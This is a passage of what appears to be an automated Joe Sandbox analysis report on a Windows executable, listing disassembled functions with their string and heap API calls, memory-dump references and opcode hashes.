                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: a0c615255578d1aaea6ad59d38484edeec991a376937f9a0bdfaec4c2b05bd48
                            • Instruction ID: f051979e95414839dc2da68bed449d5f0a926e6c5a5ed1932155d7e28f66e810
                            • Opcode Fuzzy Hash: a0c615255578d1aaea6ad59d38484edeec991a376937f9a0bdfaec4c2b05bd48
                            • Instruction Fuzzy Hash: 4431FB723083108BE735DD6CE88096AF7E9EF99750B248E2BF549CB641E7719C4183B5
                            Function 00D66EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00D66F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D66F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: b1cd423130c35e64082a88973a1bd2f6b644729d7cbaa44032a4d06a571426d1
                            • Instruction ID: ea0af9037b5d7bdbf6f8d1cf9b32f1bd76b3a15b3af753fbb6e36bd3f893e35a
                            • Opcode Fuzzy Hash: b1cd423130c35e64082a88973a1bd2f6b644729d7cbaa44032a4d06a571426d1
                            • Instruction Fuzzy Hash: DF218EB06006019BEB208B25DC84BB773E8EF54704F48497CF946CB684E7B9E945C7A0
                            Function 00D82400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8244C
                            • lstrlen.KERNEL32(00000000), ref: 00D824E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D82570
                            • lstrlen.KERNEL32(00000000), ref: 00D82577
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: d42afa086127eeb7579eb0ff6e4f74d03677ee660b10d1c6228feda4664a0a95
                            • Instruction ID: 5f15f50c213a891f8c3a14fa3b959cc7de945e09d8f1653509d3cc8e5950913b
                            • Opcode Fuzzy Hash: d42afa086127eeb7579eb0ff6e4f74d03677ee660b10d1c6228feda4664a0a95
                            • Instruction Fuzzy Hash: 3581C5B1E002099BDB14EF98DC44BAEB7B5FF94300F2880ADE904A7281E7759D41CBB5
                            Function 00D81570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D815A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D815D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81611
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81649
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: ecd6e8e157876aff0d2f233f9d12a0c83ef7727a9c36ff59d9c0faeab194e417
                            • Instruction ID: 15c8e18c4db7e0521e43ef65342c4fa705ec281bb409fb4560e8911e7ca5d17d
                            • Opcode Fuzzy Hash: ecd6e8e157876aff0d2f233f9d12a0c83ef7727a9c36ff59d9c0faeab194e417
                            • Instruction Fuzzy Hash: 0921CC78611B029BD724EF6AD455A27B7F9FF84700B08491DA496C7A40EB74F846CFB0
                            Function 00D61530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000), ref: 00D6162D
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D6164F
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D61671
                              • Part of subcall function 00D61610: lstrcpy.KERNEL32(00000000,?), ref: 00D61693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: f5e2f1207f9e19f898a161066a4d7c1ba11c04a41863eeb62c055efe03c32f0f
                            • Instruction ID: 7914da00042aec56bd546d845da7f5cce840161df90e6d1a39a4de2861b4255f
                            • Opcode Fuzzy Hash: f5e2f1207f9e19f898a161066a4d7c1ba11c04a41863eeb62c055efe03c32f0f
                            • Instruction Fuzzy Hash: 9E319578A11B029FC724DF3AC545956B7F5FF89305708492EA896C3B50DB70F851CBA0
                            Function 00D61610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00D6162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61693
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: f0501503b3402388f0995cffbee10aac48ed8c55a76d6eccea9478e7b00a5503
                            • Instruction ID: 8b1792c271c82a20ffc2d65133fdca237f7b05f6de426109d3157d857e2f7085
                            • Opcode Fuzzy Hash: f0501503b3402388f0995cffbee10aac48ed8c55a76d6eccea9478e7b00a5503
                            • Instruction Fuzzy Hash: 5A11FE78A11B039BDB249F79D459926B7F8FF4870170C4A2EA496C3A40EB30E841CFB4